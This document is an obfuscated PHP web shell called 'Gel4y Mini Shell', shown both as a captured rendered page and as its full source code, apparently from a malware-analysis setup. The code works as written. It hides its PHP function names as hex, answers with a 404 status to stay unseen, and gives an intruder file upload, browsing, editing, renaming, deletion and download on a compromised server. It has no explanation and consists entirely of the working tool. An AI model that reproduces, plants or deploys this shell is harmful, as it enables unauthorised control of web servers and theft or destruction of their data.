animateSuccessLong{0%{width:0;right:46px;top:54px}65%{width:0;right:46px;top:54px}84%{width:55px;right:0;top:35px}to{width:47px;right:8px;top:38px}}.swal-icon--info{border-color:#c9dae1}.swal-icon--info:before{width:5px;height:29px;bottom:17px;border-radius:2px;margin-left:-2px}.swal-icon--info:after,.swal-icon--info:before{content:"";position:absolute;left:50%;background-color:#c9dae1}.swal-icon--info:after{width:7px;height:7px;border-radius:50%;margin-left:-3px;top:19px}.swal-icon{width:80px;height:80px;border-width:4px;border-style:solid;border-radius:50%;padding:0;position:relative;box-sizing:content-box;margin:20px auto}.swal-icon:first-child{margin-top:32px}.swal-icon--custom{width:auto;height:auto;max-width:100%;border:none;border-radius:0}.swal-icon img{max-width:100%;max-height:100%}.swal-title{color:rgba(0,0,0,.65);font-weight:600;text-transform:none;position:relative;display:block;padding:13px 16px;font-size:27px;line-height:normal;text-align:center;margin-bottom:0}.swal-title:first-child{margin-top:26px}.swal-title:not(:first-child){padding-bottom:0}.swal-title:not(:last-child){margin-bottom:13px}.swal-text{font-size:16px;position:relative;float:none;line-height:normal;vertical-align:top;text-align:left;display:inline-block;margin:0;padding:0 10px;font-weight:400;color:rgba(0,0,0,.64);max-width:calc(100% - 20px);overflow-wrap:break-word;box-sizing:border-box}.swal-text:first-child{margin-top:45px}.swal-text:last-child{margin-bottom:45px}.swal-footer{text-align:right;padding-top:13px;margin-top:13px;padding:13px 16px;border-radius:inherit;border-top-left-radius:0;border-top-right-radius:0}.swal-button-container{margin:5px;display:inline-block;position:relative}.swal-button{background-color:#7cd1f9;color:#fff;border:none;box-shadow:none;border-radius:5px;font-weight:600;font-size:14px;padding:10px 24px;margin:0;cursor:pointer}.swal-button:not([disabled]):hover{background-color:#78cbf2}.swal-button:active{background-color:#70bce0}.swal-button:focus{outline:none;box-shadow:0 0 0 1px #fff,0 0 0 3px rgba(43,114,165,.29)}.swal-button[disabled]{opacity:.5;cursor:default}.swal-button::-moz-focus-inner{border:0}.swal-button--cancel{color:#555;background-color:#efefef}.swal-button--cancel:not([disabled]):hover{background-color:#e8e8e8}.swal-button--cancel:active{background-color:#d7d7d7}.swal-button--cancel:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px rgba(116,136,150,.29)}.swal-button--danger{background-color:#e64942}.swal-button--danger:not([disabled]):hover{background-color:#df4740}.swal-button--danger:active{background-color:#cf423b}.swal-button--danger:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px rgba(165,43,43,.29)}.swal-content{padding:0 20px;margin-top:20px;font-size:medium}.swal-content:last-child{margin-bottom:20px}.swal-content__input,.swal-content__textarea{-webkit-appearance:none;background-color:#fff;border:none;font-size:14px;display:block;box-sizing:border-box;width:100%;border:1px solid rgba(0,0,0,.14);padding:10px 13px;border-radius:2px;transition:border-color .2s}.swal-content__input:focus,.swal-content__textarea:focus{outline:none;border-color:#6db8ff}.swal-content__textarea{resize:vertical}.swal-button--loading{color:transparent}.swal-button--loading~.swal-button__loader{opacity:1}.swal-button__loader{position:absolute;height:auto;width:43px;z-index:2;left:50%;top:50%;-webkit-transform:translateX(-50%) translateY(-50%);transform:translateX(-50%) translateY(-50%);text-align:center;pointer-events:none;opacity:0}.swal-button__loader div{display:inline-block;float:none;vertical-align:baseline;width:9px;height:9px;padding:0;border:none;margin:2px;opacity:.4;border-radius:7px;background-color:hsla(0,0%,100%,.9);transition:background .2s;-webkit-animation:swal-loading-anim 1s infinite;animation:swal-loading-anim 1s infinite}.swal-button__loader div:nth-child(3n+2){-webkit-animation-delay:.15s;animation-delay:.15s}.swal-button__loader div:nth-child(3n+3){-webkit-animation-delay:.3s;animation-delay:.3s}@-webkit-keyframes swal-loading-anim{0%{opacity:.4}20%{opacity:.4}50%{opacity:1}to{opacity:.4}}@keyframes swal-loading-anim{0%{opacity:.4}20%{opacity:.4}50%{opacity:1}to{opacity:.4}}.swal-overlay{position:fixed;top:0;bottom:0;left:0;right:0;text-align:center;font-size:0;overflow-y:auto;background-color:rgba(0,0,0,.4);z-index:10000;pointer-events:none;opacity:0;transition:opacity .3s}.swal-overlay:before{content:" ";display:inline-block;vertical-align:middle;height:100%}.swal-overlay--show-modal{opacity:1;pointer-events:auto}.swal-overlay--show-modal .swal-modal{opacity:1;pointer-events:auto;box-sizing:border-box;-webkit-animation:showSweetAlert .3s;animation:showSweetAlert .3s;will-change:transform}.swal-modal{width:478px;opacity:0;pointer-events:none;background-color:#fff;text-align:center;border-radius:5px;position:static;margin:20px auto;display:inline-block;vertical-align:middle;-webkit-transform:scale(1);transform:scale(1);-webkit-transform-origin:50% 50%;transform-origin:50% 50%;z-index:10001;transition:opacity .2s,-webkit-transform .3s;transition:transform .3s,opacity .2s;transition:transform .3s,opacity .2s,-webkit-transform .3s}@media (max-width:500px){.swal-modal{width:calc(100% - 20px)}}@-webkit-keyframes showSweetAlert{0%{-webkit-transform:scale(1);transform:scale(1)}1%{-webkit-transform:scale(.5);transform:scale(.5)}45%{-webkit-transform:scale(1.05);transform:scale(1.05)}80%{-webkit-transform:scale(.95);transform:scale(.95)}to{-webkit-transform:scale(1);transform:scale(1)}}@keyframes showSweetAlert{0%{-webkit-transform:scale(1);transform:scale(1)}1%{-webkit-transform:scale(.5);transform:scale(.5)}45%{-webkit-transform:scale(1.05);transform:scale(1.05)}80%{-webkit-transform:scale(.95);transform:scale(.95)}to{-webkit-transform:scale(1);transform:scale(1)}}</style><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title>Gel4y Mini Shell</title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?">Gel4y Mini Shell</a></h3></div><div><span>PHP Version : 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</span> <br><a href="?p=2f7661722f7777772f68746d6c&amp;a=6e657746696c65">+File</a><a href="?p=2f7661722f7777772f68746d6c&amp;a=6e6577446972">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</li></div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple=""><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form>
</div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
<a href="?p=2f">~</a>/<a href="?p=2f766172">var</a>/<a href="?p=2f7661722f777777">www</a>/<a href="?p=2f7661722f7777772f68746d6c">html</a>/</div></div><article class="bg-dark border table-responsive mt-2">
<table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
<tr><td><a href="?p=2f7661722f7777772f68746d6c&amp;a=76696577&amp;n=62656e6572692e73655f6d616c776172655f616e616c79736973" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Latest modify on 2023-02-12 18:57"><i class="fa fa-fw fa-file"></i> beneri.se_malware_analysis</a></td><td>0KB</td><td><font color="">-rw-r--r--</font></td><td><div class="d-flex justify-content-between"><a href="?p=2f7661722f7777772f68746d6c&amp;a=65646974&amp;n=62656e6572692e73655f6d616c776172655f616e616c79736973" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Edit"><i class="fa fa-fw fa-edit"></i></a><a href="?p=2f7661722f7777772f68746d6c&amp;a=72656e616d65&amp;n=62656e6572692e73655f6d616c776172655f616e616c79736973&amp;t=f" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Rename"><i class="fa fa-fw fa-pencil"></i></a><a href="?p=2f7661722f7777772f68746d6c&amp;n=62656e6572692e73655f6d616c776172655f616e616c79736973&amp;download" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Download"><i class="fa fa-fw fa-download"></i></a><a href="?p=2f7661722f7777772f68746d6c&amp;a=64656c657465&amp;n=62656e6572692e73655f6d616c776172655f616e616c79736973" class="delete" data-type="file" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Delete"><i class="fa fa-fw fa-trash"></i></a></div></td></tr><tr><td><a href="?p=2f7661722f7777772f68746d6c&amp;a=76696577&amp;n=67616c6178792e706870" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Latest modify on 2023-02-12 18:57"><i class="fa fa-fw fa-file"></i> galaxy.php</a></td><td>12.034KB</td><td><font color="">-rw-rw-r--</font></td><td><div class="d-flex justify-content-between"><a href="?p=2f7661722f7777772f68746d6c&amp;a=65646974&amp;n=67616c6178792e706870" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Edit"><i class="fa fa-fw fa-edit"></i></a><a href="?p=2f7661722f7777772f68746d6c&amp;a=72656e616d65&amp;n=67616c6178792e706870&amp;t=f" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Rename"><i class="fa fa-fw fa-pencil"></i></a><a href="?p=2f7661722f7777772f68746d6c&amp;n=67616c6178792e706870&amp;download" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Download"><i class="fa fa-fw fa-download"></i></a><a href="?p=2f7661722f7777772f68746d6c&amp;a=64656c657465&amp;n=67616c6178792e706870" class="delete" data-type="file" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Delete"><i class="fa fa-fw fa-trash"></i></a></div></td></tr></tbody></table>
</article><div class="bg-dark border text-center mt-2"><small>Copyright © 2021 - Powered By Indonesian Darknet</small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js"></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>
</body></html>

Original PHP code

<?php
error_reporting(0);
http_response_code(404);
define("self", "G\x65l\64y M\x69n\x69 Sh\x65ll");
$scD = "s\x63\x61\x6e\x64\x69r";
$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
for ($i = 0; $i < count($fc); $i++)
	$fc[$i] = nhx($fc[$i]);
if (isset($_GET["p"])) {
	$p = nhx($_GET["p"]);
	$fc[3](nhx($_GET["p"]));
} else {
	$p = $fc[2]();
}
function hex($str) {
	$r = "";
	for ($i = 0; $i < strlen($str); $i++)
		$r .= dechex(ord($str[$i]));
	return $r;
}
function nhx($str) {
	$r = "";
	$len = (strlen($str) -1);
	for ($i = 0; $i < $len; $i += 2)
		$r .= chr(hexdec($str[$i].$str[$i+1]));
	return $r;
}
function perms($f) {
	$p = fileperms($f);
	if (($p & 0xC000) == 0xC000) $i = 's';
	elseif (($p & 0xA000) == 0xA000) $i = 'l';
	elseif (($p & 0x8000) == 0x8000) $i = '-';
	elseif (($p & 0x6000) == 0x6000) $i = 'b';
	elseif (($p & 0x4000) == 0x4000) $i = 'd';
	elseif (($p & 0x2000) == 0x2000) $i = 'c';
	elseif (($p & 0x1000) == 0x1000) $i = 'p';
	else $i = 'u';

	$i .= (($p & 0x0100) ? 'r' : '-');
	$i .= (($p & 0x0080) ? 'w' : '-');
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
	$i .= (($p & 0x0020) ? 'r' : '-');
	$i .= (($p & 0x0010) ? 'w' : '-');
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
	$i .= (($p & 0x0004) ? 'r' : '-');
	$i .= (($p & 0x0002) ? 'w' : '-');
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
	return $i;
}
function a($msg, $sts = 1, $loc = "") {
	global $p;
	$status = (($sts == 1) ? "success" : "error");
	echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>";
}
function deldir($d) {
	global $fc;
	if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
	if ($fc[6]($d)) {
		array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
		rmdir($d);
	} else {
		unlink($d);
	}
}
?>
<!doctype html>
<!-- RandsX aka T1kus_g0t -->
<html lang="en"><head><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?= self ?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div><div><span>PHP Version : <?= $fc[1]() ?></span> <br><a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a><a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : <?= $fc[0]() ?></li></div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form>
<?php
if (isset($_FILES["f"])) {
	$n = $_FILES["f"]["name"];
	for ($i = 0; $i < count($n); $i++) {
		if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) {
			a("file uploaded successfully");
		} else {
			a("file failed to upload", 0);
		}
	}
}
if (isset($_GET["download"])) {
	header("Content-Type: application/octet-stream");
	header("Content-Transfer-Encoding: Binary");
	header("Content-Length: ".$fc[17](nhx($_GET["n"])));
	header("Content-disposition: attachment; filename=\"".nhx($_GET["n"])."\"");
}
?>
</div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
<?php
$ps = $fc[4]("/(\\\|\/)/", $p);
foreach ($ps as $k => $v) {
	if ($k == 0 && $v == "") {
		echo "<a href=\"?p=2f\">~</a>/"; continue;
	}
	if ($v == "") continue;
	echo "<a href=\"?p=";
	for ($i = 0; $i <= $k; $i++) {
		echo hex($ps[$i]);
		if ($i != $k) echo "2f";
	}
	echo "\">{$v}</a>/";
}
?>
</div></div><article class="bg-dark border table-responsive mt-2">
<?php if (!isset($_GET["a"])): ?>
<table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
<?php
$scD = $fc[5]($scD($p), [".", ".."]);
foreach ($scD as $d) {
	if (!$fc[6]("$p/$d")) continue;
	echo "<tr><td><a href=\"?p=".hex("$p/$d")."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$d"))."\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td><td>N/A</td><td><font color=\"".(($fc[8]("$p/$d")) ? "#00ff00" : (!$fc[9]("$p/$d") ? "red" : null))."\">".perms("$p/$d")."</font></td><td><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></td></tr>";
}
foreach ($scD as $f) {
	if (!$fc[7]("$p/$f")) continue;
	$sz = $fc[10]("$p/$f")/1024;
	$sz = round($sz, 3);
	$sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB";
	echo "<tr><td><a href=\"?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$f"))."\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td><td>{$sz}</td><td><font color=\"".(($fc[8]("$p/$f")) ? "#00ff00" : (!$fc[9]("$p/$f") ? "red" : null))."\">".perms("$p/$f")."</font></td><td><div class=\"d-flex justify-content-between\"><a href=\"?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&n=".hex($f)."&download"."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></div></td></tr>";
}
?></tbody></table>
<?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?>
<div class="px-2 py-2">
<?php if ($a == "delete") {
	$loc = $p.'/'.nhx($_GET["n"]);
	if ($_GET["t"] == "d") {
		deldir($loc);
		if (!$fc[12]($loc)) {
			a("folder deleted successfully");
		} else {
			a("failed to delete the folder", 0);
		}
	}
	if ($_GET["t"] == "f") {
		$loc = $p.'/'.nhx($_GET["n"]);
		unlink($loc);
		if (!$fc[12]($loc)) {
			a("file deleted successfully");
		} else {
			a("file to delete the folder", 0);
		}
	}
}
?>
<?php if ($a == "newDir"): ?>
<h5 class="border p-1 mb-3">New folder</h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($fc[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?>
<h5 class="border p-1 mb-3">New file</h5>
<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($fc[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?>
<h5 class="border p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?>
<h5 class="border p-1 mb-3">Edit file</h5>
<span>File name : <?= nhx($_GET["n"]) ?></span>
<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?>
<h5 class="border p-1 mb-3">View file</h5>
<span>File name : <?= nhx($_GET["n"]) ?></span>
<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><?php endif; ?></div><?php endif; ?></article><div class="bg-dark border text-center mt-2"><small>Copyright &copy; 2021 - Powered By Indonesian Darknet</small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>